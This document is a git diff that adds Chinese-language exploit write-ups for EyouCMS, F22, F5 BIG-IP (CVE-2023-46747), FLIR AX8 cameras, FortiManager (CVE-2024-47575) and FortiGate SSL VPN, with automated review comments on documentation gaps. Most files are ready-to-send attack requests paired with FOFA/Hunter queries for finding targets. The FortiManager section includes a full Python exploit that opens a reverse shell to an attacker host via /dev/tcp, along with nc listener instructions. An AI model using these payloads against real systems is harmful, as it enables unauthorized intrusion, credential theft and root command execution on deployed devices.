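Review bot: the GetOSpById 漏洞简介 omits the operation name (it only says `EnjoyRMIS存在SQL注入漏洞`), unlike the other EnjoyRMIS files, and the endpoint here is different (`/EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx`), which is worth stating in the summary. The request block has lost its SOAP envelope, and the `sqlmap` heading is followed only by a screenshot with no text, so nothing in this file is verifiable from the text alone. No version is given and the `> 原文:` footer is empty.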
@@ -0,0 +1,73 @@ +## EyouCMS文件包含RCE漏洞 + +First, download the latest source code from the official website: +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736654.png) +After downloading, use PHPStudy Pro to set up the website: +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736275.png) +Proceed with the installation process, setting up the database information and admin password: +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736805.png) +In the admin panel, verify that the current version is the latest: +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736228.png) +Prepare a malicious payload in the form of an image, utilizing Remote Code Execution (RCE) via template file inclusion: + +``` +GIF89a + +``` +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736384.png) +Upload the image payload: +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736923.png) +Choose the WeChat public account interface: +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736602.png) +Proceed with the upload and obtain the returned path: +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736696.png) + +``` +uploads/allimg/20230901/1-230Z1151QR14.gif +``` +Return to the template configuration, set up security questions: +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061736323.png) +After configuring security questions, edit the "index.htm" template under the PC section: +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737706.png)Input the following payload: + +``` +{eyou:include file="uploads/allimg/20230901/1-230Z1151QR14.gif" /} +``` +Append it at the end: +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737598.png) +After submission: +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737557.png) 
+Return to the homepage, where arbitrary code execution can be observed: +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737266.png) + +## Code Audit +Firstly, the `eyou:include` tag is present in the list of parsed tags, and there is no filtering mechanism applied to it: +``` +core\library\think\Template.php +``` +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737623.png) +The template file "index.htm" is read and stored in the `$content` variable. Parsing takes place in "core\library\think\Template.php":![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737286.png) +We can observe the `parseEyouInclude` function: +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737366.png) +Inside this function, the template is analyzed and processed, where we can see that only string operations are performed, and no security risk evaluation is conducted:![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737380.png) +Finally, at the end, the tags are replaced and returned: +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737460.png) +Due to the absence of security filtering, the include tag's parsing result directly reads and replaces content: +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737841.png) +Similarly, in the "Template.php" file, writing to the cache occurs: +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737357.png) +Digging deeper: + +``` +core\library\think\template\driver\File.php +``` +In the `write` method, content is directly written: +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737034.png) +Cache directory: +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061737865.png) +Ultimately, in the `read` method of "File.php," the temporarily generated file is included, leading to Remote Code Execution (RCE): + +``` 
+core\library\think\template\driver\File.php +``` +![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061738568.png) \ No newline at end of file diff --git a/F22服装管理软件系统Load存在任意文件读取漏洞.md b/F22服装管理软件系统Load存在任意文件读取漏洞.md new file mode 100644 index 0000000..159cdae --- /dev/null +++ b/F22服装管理软件系统Load存在任意文件读取漏洞.md @@ -0,0 +1,23 @@ +# F22服装管理软件系统Load存在任意文件读取漏洞 +广州锦铭泰软件科技有限公司开发的F22服装管理软件系统Load存在任意文件读取漏洞 + +## fofa +```javascript +body="F22WEB登陆" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730457537214-4b469bb6-9e58-4a78-a265-a4af3a533914.png) + +## poc +```java +GET /CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../Web.config HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: keep-alive +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730457891046-7fb9c455-fe97-49e6-b36e-a737c0d4719e.png) + diff --git a/F5-BIG-IP-远程代码执行漏洞(CVE-2023-46747).md b/F5-BIG-IP-远程代码执行漏洞(CVE-2023-46747).md new file mode 100644 index 0000000..2c363d6 --- /dev/null +++ b/F5-BIG-IP-远程代码执行漏洞(CVE-2023-46747).md 
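Review bot: the EyouCMS write-up never states the version tested (`the latest` at the time of the screenshots is unverifiable) and never states the precondition that the whole chain requires an authenticated administrator with template-editing rights and the template security questions configured; the title `文件包含RCE` should say this is an authenticated admin template include leading to RCE, since that changes the risk rating. The `GIF89a` block contains only the GIF header, the PHP portion having been lost in the paste, and the upload path `uploads/allimg/20230901/1-230Z1151QR14.gif` is specific to the author's lab and should be marked as an example. The code-audit section cites `core\library\think\Template.php` and `File.php` by screenshot only; quoting the relevant lines of `parseEyouInclude` and of the `write`/`read` methods would make the audit checkable without images.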
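Review bot: the F22 file fences an HTTP request as ```java and its FOFA query as ```javascript; use a plain fence for both. It names the vendor but gives no product version, no vendor fix and no CVE/CNVD reference, so the issue cannot be tracked. The `Load.ashx?type=image&file=../Web.config` read shows the impact (connection strings in `Web.config`) but the text should say whether authentication is required, since the request carries no cookie.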
@@ -0,0 +1,106 @@ +## F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747) + +## 漏洞描述 + +**F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747)**,未经授权的远程攻击者通过管理端口或自身IP地址访问BIG-IP系统,利用此漏洞可能绕过身份认证,导致在暴露流量管理用户界面(TMUI)的 F5 BIG-IP 实例上执行任意代码。 + +## 影响版本 + +``` +F5 BIG-IP <= 17.1.0 +16.1.0 <= F5 BIG-IP <= 16.1.4 +15.1.0 <= F5 BIG-IP <= 15.1.10 +14.1.0 <= F5 BIG-IP <= 14.1.5 +13.1.0 <= F5 BIG-IP <= 13.1.5 +``` + +## 环境下载 + +``` +https://my.f5.com/manage/s/downloads?productFamily=BIG-IP&productLine=big-ip_v15.x&version=15.1.8&container=Virtual-Edition&files=BIGIP-15.1.8-0.0.7.ALL-vmware.ova&locations=JAPAN + +链接:https://pan.baidu.com/s/1zLMXJCKtZtzIxCQGoxwPgg +提取码:ksdn +``` + +搭建方式很简单,下载BIGIP-15.1.8-0.0.7.ALL-vmware.ova,接着用vm打开ova即可 + +搭建过程 [F5 WMware虚拟机环境搭建-BIG-IP Virtual Edition 11.3.0-CSDN博客](https://blog.csdn.net/ice_age1/article/details/49998059) + +重置web密码 + +``` +进入tmsh模式 敲击 +modify auth user admin password admin +``` + +搭建成功页面 + + + +## 漏洞复现 + +### 第一步 发送 TMUI模块的请求 + +当发送到F5 BIG-IP TMUI模块的请求(例如登陆页面/tmui/login.jsp)中,包含一个类似值为 "xxx, chunked" 的 "Transfer-Encoding" 头,并且请求体内容满足特定内容时,漏洞会被触发。 + +&name=adminqq&name_before=&passwd=admin789456 参数填入创建账户 + +``` +POST /tmui/login.jsp HTTP/1.1 +Host: 192.168.127.146 +Content-Type: application/x-www-form-urlencoded + + +204 +HTTP/1.1/tmui/Control/form 127.0.0.1 localhost localhostP Tmui-Dubbuf BBBBBBBBBBB +REMOTEROLE0� localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=adminqq&name_before=&passwd=admin789456&passwd_before=&finished=x&finished_before=� +0 +``` + +![](./assets/20231031212344495.png) + + + +### 第二步 获取用户token + +``` +POST /mgmt/shared/authn/login HTTP/1.1 +Host: 192.168.127.146 +Content-Length: 22 +Content-Type: application/x-www-form-urlencoded + + {"username":"admin", "password":"admin789456"} +``` + 
+![](./assets/20231031212450387.png) + + + +### 第三步 执行命令 + +将获取到得token带入`X-F5-Auth-Token`中,在通过`/mgmt/tm/util/bash` 执行命令 + +``` +POST /mgmt/tm/util/bash HTTP/1.1 +Host: 192.168.127.146 +Connection: keep-alive +Content-Length: 22 +X-F5-Auth-Token:ICGZXJJROASFRPWYZF3EAQFCGN + + {"command":"run","utilCmdArgs":"-c whoami"} +``` + +![](./assets/20231031212657529.png) + + + +### 参考链接 + +``` +https://mp.weixin.qq.com/s/iN7rlJJaI4sl-fiL0eMXsQ +https://github.com/projectdiscovery/nuclei-templates/blob/56d79688e0d2ebce5b8939961946f4f32e663700/http/cves/2023/CVE-2023-46747.yaml +https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg +https://blog.csdn.net/ice_age1/article/details/49998059 +``` + diff --git a/FLIR-AX8热成像仪applyfirmware存在远程命令执行漏洞.md b/FLIR-AX8热成像仪applyfirmware存在远程命令执行漏洞.md new file mode 100644 index 0000000..e3b8d60 --- /dev/null +++ b/FLIR-AX8热成像仪applyfirmware存在远程命令执行漏洞.md @@ -0,0 +1,25 @@ +# FLIR-AX8热成像仪applyfirmware存在远程命令执行漏洞 + +FLIR-AX8热成像仪applyfirmware存在远程命令执行漏洞,允许攻击者在目标服务器上执行任意系统命令,可能导致服务器被完全控制、数据泄露或破坏,严重威胁系统安全。 + +## hunter + +```javascript +web.icon=="f4370ff0b4763e18159cd7cdf36a4542" +``` + +## poc + +```javascript +GET /settings/applyfirmware/;id>123457.txt;/false HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: ****** +Upgrade-Insecure-Requests: 1 +Priority: u=0, i +``` + diff --git a/FLIR-AX8热成像仪download.php存在任意文件读取漏洞.md b/FLIR-AX8热成像仪download.php存在任意文件读取漏洞.md new file mode 100644 index 0000000..02188ce --- /dev/null +++ b/FLIR-AX8热成像仪download.php存在任意文件读取漏洞.md 
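Review bot: in the F5 CVE-2023-46747 file the first request body contains binary bytes rendered as `�`, so the text is not byte-accurate and cannot be copied as shown; point readers to the nuclei template already listed under 参考链接 as the authoritative encoding. The 环境下载 block includes a personal Baidu mirror (链接/提取码) of vendor software, which should be removed in favour of the official download link above it. `Content-Length: 22` on the `/mgmt/shared/authn/login` request does not match the JSON body that follows, the 搭建成功页面 heading has nothing beneath it, and the file lists vulnerable ranges without the fixed versions.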
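Review bot: the applyfirmware request carries `Cookie: ******`, which implies a valid session, but the description does not say whether the endpoint is reachable without authentication; state the precondition, since it changes the severity. The request also writes command output to a file on the device (`>123457.txt`) rather than only reading, which the text should mention. The file has no affected firmware version, no CVE and no vendor fix, unlike the res.php CVE-2022-37061 file later in this commit, and both the hunter query and the request are fenced as ```javascript.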
@@ -0,0 +1,30 @@ +# FLIR-AX8热成像仪download.php存在任意文件读取漏洞 + +FLIR-AX8热成像仪download.php存在任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。 + +## hunter + +```javascript +web.icon=="f4370ff0b4763e18159cd7cdf36a4542" +``` + +## poc + +```javascript +POST /download.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: **** +Upgrade-Insecure-Requests: 1 +Priority: u=0, i +Content-Type: application/x-www-form-urlencoded +Content-Length: 24 + +file=../../../etc/passwd +``` + +![image-20240927202649846](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272026907.png) diff --git a/FLIR-AX8热成像仪palette.php存在远程命令执行漏洞.md b/FLIR-AX8热成像仪palette.php存在远程命令执行漏洞.md new file mode 100644 index 0000000..c285dc7 --- /dev/null +++ b/FLIR-AX8热成像仪palette.php存在远程命令执行漏洞.md @@ -0,0 +1,30 @@ +# FLIR-AX8热成像仪palette.php存在远程命令执行漏洞 + +FLIR-AX8热成像仪palette.php存在远程命令执行漏洞,允许攻击者在目标服务器上执行任意系统命令,可能导致服务器被完全控制、数据泄露或破坏,严重威胁系统安全。 + +## hunter + +```javascript +web.icon=="f4370ff0b4763e18159cd7cdf36a4542" +``` + +## poc + +```javascript +POST /palette.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: **** +Upgrade-Insecure-Requests: 1 +Priority: u=0, i +Content-Type: application/x-www-form-urlencoded +Content-Length: 19 + +palette=;id>66.txt; +``` + +![image-20240927202542338](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272025400.png) 
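Review bot: download.php has the same gap as the other FLIR files: `Cookie: ****` suggests authentication is required but the text does not say so; affected versions and a fix are absent; the raw request is fenced as ```javascript. The screenshot alt text `image-20240927202649846` is an editor artifact and should be a descriptive caption.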
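Review bot: the palette.php request writes command output into a file on the device (`>66.txt`) rather than only reading, so the PoC leaves an artifact behind; the file should say so. As with the sibling FLIR files, the redacted cookie implies authentication that the description does not mention, no versions or fix are given, and the fences are ```javascript for a hunter query and a raw request.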
diff --git a/FLIR-AX8热成像仪res.php存在远程命令执行漏洞.md b/FLIR-AX8热成像仪res.php存在远程命令执行漏洞.md new file mode 100644 index 0000000..a0de118 --- /dev/null +++ b/FLIR-AX8热成像仪res.php存在远程命令执行漏洞.md @@ -0,0 +1,29 @@ +# FLIR-AX8热成像仪res.php存在远程命令执行漏洞 + +FLIR-AX8热成像仪res.php存在远程命令执行漏洞,允许攻击者在目标服务器上执行任意系统命令,可能导致服务器被完全控制、数据泄露或破坏,严重威胁系统安全。 + +## hunter + +```javascript +web.icon=="f4370ff0b4763e18159cd7cdf36a4542" +``` + +## poc + +```javascript +POST /res.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: ***** +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 67 + +action=node&resource=1;pwd +``` + +![image-20240927202446271](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272024333.png) diff --git a/FLIR-AX8热成像仪res.php远程命令执行漏洞(CVE-2022-37061).md b/FLIR-AX8热成像仪res.php远程命令执行漏洞(CVE-2022-37061).md new file mode 100644 index 0000000..09aca39 --- /dev/null +++ b/FLIR-AX8热成像仪res.php远程命令执行漏洞(CVE-2022-37061).md 
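Review bot: the res.php file's `Content-Length: 67` does not match the body `action=node&resource=1;pwd`, so the request as written is not a faithful capture. The same endpoint and parameter appear again in the next file under CVE-2022-37061, so this file is a duplicate without the identifier; merge them or cross-reference. The cookie is redacted but the authentication requirement is not stated, and the fences are ```javascript.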
@@ -0,0 +1,37 @@ +# FLIR-AX8热成像仪res.php远程命令执行漏洞(CVE-2022-37061) + +# 一、漏洞简介 +FLIR-AX8是美国菲力尔公司(Teledyne FLIR)旗下的一款工业红外热像仪AX8,英文名为Teledyne FLIR AX8 thermal sensor cameras。菲力尔公司专注于设计、开发、生产、营销和推广用于增强态势感知力的专业技术,通过热成像、可见光成像、视频分析、测量和诊断以及先进的威胁检测系统,将创新的传感解决方案带入日常生活中,广泛服务于政府与国防、工业和商业市场。FLIR AX8 版本 1.46.16 及以下未经身份验证的远程操作系统命令注入漏洞。res.php 页面中的 id 参数可以通过命令拼接,以 root 用户身份注入和执行任意 shell 命令,成功的利用可能允许攻击者以 root 权限在底层操作系统上执行任意命令。 + +# 二、影响版本 ++ FLIR-AX8 1.46.16及以下 + +# 三、资产测绘 ++ hunter`web.icon=="f4370ff0b4763e18159cd7cdf36a4542"` ++ 登录页面 + +![1694186568199-799956f5-3035-4a87-903e-1f67c1769f8b.png](./img/iXVn8Cpt4z6Nrh1L/1694186568199-799956f5-3035-4a87-903e-1f67c1769f8b-274172.png) + +# 四、漏洞复现 +```plain +POST /res.php HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: theme=light; distanceUnit=metric; temperatureUnit=celsius; showCameraId=false; clientTimeZoneOffset=-480; clientTimeZoneDST=0; PHPSESSID=8ff0e4065c8a04d1894ddde494f0fe8d +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 25 + +action=node&resource=1;id +``` + +![1694186735678-95a1cc2e-58c0-47de-b006-fa265dae6848.png](./img/iXVn8Cpt4z6Nrh1L/1694186735678-95a1cc2e-58c0-47de-b006-fa265dae6848-356757.png) + + + +> 更新: 2024-02-29 23:57:14 +> 原文: \ No newline at end of file diff --git a/FortiManager身份认证绕过漏洞(CVE-2024-47575).md b/FortiManager身份认证绕过漏洞(CVE-2024-47575).md new file mode 100644 index 0000000..9137d0e --- /dev/null +++ b/FortiManager身份认证绕过漏洞(CVE-2024-47575).md 
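Review bot: the CVE-2022-37061 write-up says the injection is in the `id` parameter of res.php, but the request shown injects through `resource`; align the text with the request. The `Cookie:` line includes a live-looking `PHPSESSID` value from the author's session, which the other FLIR files redact; redact it here too. This is the only FLIR file that gives an affected version (1.46.16 及以下); the sibling FLIR files should reuse it if the same firmware applies. The `> 原文:` footer is empty.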
@@ -0,0 +1,257 @@ +# FortiManager身份认证绕过漏洞(CVE-2024-47575) + +**Fortinet FortiManager 身份认证绕过漏洞(CVE-2024-47575)**,未经身份验证的远程攻击者可以使用有效的 FortiGate 证书在 FortiManager 中注册未经授权的设备。成功利用漏洞后攻击者将能够查看和修改文件(例如配置文件)以获取敏感信息,并能够管理其他设备执行任意代码或命令。 + +## **影响版本** + +7.6.0 <= FortiManager 7.6.* <= 7.6.0 + +7.4.0 <= FortiManager 7.4.* <= 7.4.4 + +7.2.0 <= FortiManager 7.2.* <= 7.2.7 + +7.0.0 <= FortiManager 7.0.* <= 7.0.12 + +6.4.0 <= FortiManager 6.4.* <= 6.4.14 + +6.2.0 <= FortiManager 6.2.* <= 6.2.12 + +7.4.1 <= FortiManager Cloud 7.4.* <= 7.4.4 + +7.2.1 <= FortiManager Cloud 7.2.* <= 7.2.7 + +7.0.1 <= FortiManager Cloud 7.0.* <= 7.0.12 + +FortiManager Cloud 6.4.* + +## poc + +脚本来源 https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575 + +```python +import socket +import struct +import ssl +import argparse +import random +from time import sleep + + + +banner = """ __ ___ ___________ + __ _ ______ _/ |__ ____ | |_\\__ ____\\____ _ ________ + \\ \\/ \\/ \\__ \\ ___/ ___\\| | \\| | / _ \\ \\/ \\/ \\_ __ \\ + \\ / / __ \\| | \\ \\___| Y | |( <_> \\ / | | \\/ + \\/\\_/ (____ |__| \\___ |___|__|__ | \\__ / \\/\\_/ |__| + \\/ \\/ \\/ + + CVE-2024-47575.py + (*) FortiManager Unauthenticated Remote Code Execution (CVE-2024-47575) exploit by watchTowr + + - Sina Kheirkhah (@SinSinology), watchTowr (sina@watchTowr.com) + + CVEs: [CVE-2024-47575] +""" + + +print(banner) +parser = argparse.ArgumentParser(description='FortiManager CVE-2024-47575 exploit') +parser.add_argument('--target', type=str, help='Target IP', required=True) +parser.add_argument('--lhost', type=str, help='attacker IP', required=False, default='empty') +parser.add_argument('--lport', type=str, help='attacker PORT', required=False, default='empty') +parser.add_argument('--action', type=str, choices=['check', 'exploit'], help='Choose an action: "check" or "exploit"', required=True) +args = parser.parse_args() + + + +if(args.action == "exploit"): + if(args.lhost == 'empty' or args.lport == 'empty'): + print("[ERROR] you 
got an error, because you chose the 'exploit' mode but didnt provide the '--lhost and --lport'") + exit(1) + + +# print("[DEBUG] go and run the following command on your fortimanager -> tail -f /var/log/fdssvrd.log") +# input("press enter to continue") + + +request_getip = b"""get ip +serialno=FGVMEVWG8YMT3R63 +mgmtid=00000000-0000-0000-0000-000000000000 +platform=FortiGate-VM64 +fos_ver=700 +minor=2 +patch=2 +build=1255 +branch=1255 +maxvdom=2 +fg_ip=192.168.1.53 +hostname=FGVMEVWG8YMT3R63 +harddisk=yes +biover=04000002 +harddisk_size=30720 +logdisk_size=30235 +mgmt_mode=normal +enc_flags=0 +first_fmgid= +probe_mode=yes +vdom=root +intf=port1 +\0""".replace(b"\n",b"\r\n") + + + +request_auth=b"""get auth +serialno=FGVMEVWG8YMT3R63 +mgmtid=00000000-0000-0000-0000-000000000000 +platform=FortiGate-60E +fos_ver=700 +minor=2 +patch=4 +build=1396 +branch=1396 +maxvdom=2 +fg_ip=192.168.1.53 +hostname=FortiGate +harddisk=yes +biover=04000002 +harddisk_size=30720 +logdisk_size=30107 +mgmt_mode=normal +enc_flags=0 +mgmtip=192.168.1.53 +mgmtport=443 +\0""".replace(b"\n",b"\r\n") + + + + +request_file_exchange = b"""get file_exchange +localid=REPLACE_LOCAL_ID +chan_window_sz=32768 +deflate=gzip +file_exch_cmd=put_json_cmd + +\0""".replace(b"\n", b"\r\n").replace(b"REPLACE_LOCAL_ID", str(random.randint(100,999)).encode()) + +json_payload = b"""{ + "method": "exec", + "id": 1, + "params": [ + { + "url": "um/som/export", + "data": { + "file":"`sh -i >& /dev/tcp/REPLACE_LHOST/REPLACE_LPORT 0>&1`" + } + } + ] +}""".replace(b"REPLACE_LHOST", args.lhost.encode()).replace(b"REPLACE_LPORT", args.lport.encode()) +request_channel_open = b"""channel +remoteid=REPLACE_REMOTE_ID + +\0""".replace(b"\n", b"\r\n") + +request_channel_open += str(len(json_payload)).encode() +request_channel_open += b"\n" +request_channel_open += json_payload +request_channel_open += b"0\n" + + +request_channel_close = b"""channel +action=close +remoteid=REPLACE_REMOTE_ID + +\0""".replace(b"\n", b"\r\n") + + 
+def sendmsg(socket, request, recv=True): + message=struct.pack(">II", 0x36e01100, len(request)+8)+request + socket.send(message) + if(not recv): + return + hdr=socket.read(8) + if len(hdr)!=8: + return hdr + magic, size=struct.unpack(">II", socket.read(8)) + return socket.read(size) + + +def create_ssl_sock(): + context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) + context.load_cert_chain(certfile="w00t_cert.bin", keyfile="w00t_key.bin") # Load the certificate and key + context.check_hostname = False + context.verify_mode = ssl.CERT_NONE + + s = socket.create_connection(host, 30) + ssl_sock = context.wrap_socket(s) + return ssl_sock + +def print_n_sleep(msg, s=0.4): + print(msg) + sleep(s) + +host = (args.target, 541) + +ssl_sock = create_ssl_sock() + + +response= sendmsg(ssl_sock, request_getip) +# print(response) + + + +response= sendmsg(ssl_sock, request_auth) +# print(response) + + + +response = sendmsg(ssl_sock, request_file_exchange) +remote_id = response.decode().split('\r\n')[1].split('=')[1].strip() + +if(remote_id !=None): + print(f"[VULN] Target is Vulnerable") +else: + print(f"[SAFE] Target is Safe") + exit(1) + +if(args.action == "check"): + exit(1) + + +request_channel_open = request_channel_open.replace(b"REPLACE_REMOTE_ID", remote_id.encode()) +response = sendmsg(ssl_sock, request_channel_open, False) + +# print(response) + + + +request_channel_close = request_channel_close.replace(b"REPLACE_REMOTE_ID", remote_id.encode()) + +response = sendmsg(ssl_sock, request_channel_close, True) +# print(response) + + + +``` + +首先,建立您的 ncat 会话: + +``` +nc -lvvnp 80 +``` + +然后,执行我们的exp: + +``` +python3 CVE-2024-47575.py --target 192.168.1.110 --lhost 192.168.1.53 --lport 80 --action exploit +``` + +要单独检查漏洞,请使用以下选项: + +``` +python3 CVE-2024-47575.py --target 192.168.1.110 --action check +``` + +## 漏洞来源 + +- https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575 +- 
https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/ \ No newline at end of file diff --git a/FortigateSSLVPNfgt_lang存在任意文件读取漏洞.md b/FortigateSSLVPNfgt_lang存在任意文件读取漏洞.md new file mode 100644 index 0000000..b1440c8 --- /dev/null +++ b/FortigateSSLVPNfgt_lang存在任意文件读取漏洞.md @@ -0,0 +1,33 @@ +# Fortigate SSL VPN fgt_lang存在任意文件读取漏洞 + +# 一、漏洞简介 +飞塔防火墙设备的专用名词,Fortinet是飞塔的品牌,而FortiGate 是指飞塔硬件。Fortinet的屡获殊荣的FortiGate系列,是采用ASIC加速的UTM解决方案,可以有效地防御网络层和内容层的攻击。Fortinet将其SSL VPN产品线称为Fortigate SSL VPN,主要应用于最终用户以及中型企业。目前互联网上这些服务器的数量已超过48万台,主要集中在亚洲及欧洲区域。FortinetSSL VPN系统存在任意文件读取漏洞,攻击者通过漏洞可以通过VPN进入内网,导致内网失陷。 + +# 二、影响版本 ++ Fortigate SSL VPN + +# 三、资产测绘 ++ fofa`app="FORTINET-SSLVPN"` ++ 特征 + +![1708092353453-aa4ebd52-c568-4244-9a91-8c5c81c9e9ec.png](./img/E8qdadyp9jQpN2G8/1708092353453-aa4ebd52-c568-4244-9a91-8c5c81c9e9ec-894218.png) + +# 四、漏洞复现 +```java +GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1 +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: keep-alive +``` + +![1708092406691-a59dc5bf-81c2-4ef9-8253-ee3897ec4f44.png](./img/E8qdadyp9jQpN2G8/1708092406691-a59dc5bf-81c2-4ef9-8253-ee3897ec4f44-016213.png) + +根据账号密码登录即可 + +![1708092442244-dbe869e6-9452-46df-a907-52a65b5f547f.png](./img/E8qdadyp9jQpN2G8/1708092442244-dbe869e6-9452-46df-a907-52a65b5f547f-370030.png) + + + +> 更新: 2024-02-29 23:57:11 +> 原文: \ No newline at end of file diff --git a/FortinetFortiOSmessage存在xss漏洞.md b/FortinetFortiOSmessage存在xss漏洞.md new file mode 100644 index 0000000..0d61b41 --- /dev/null +++ b/FortinetFortiOSmessage存在xss漏洞.md 
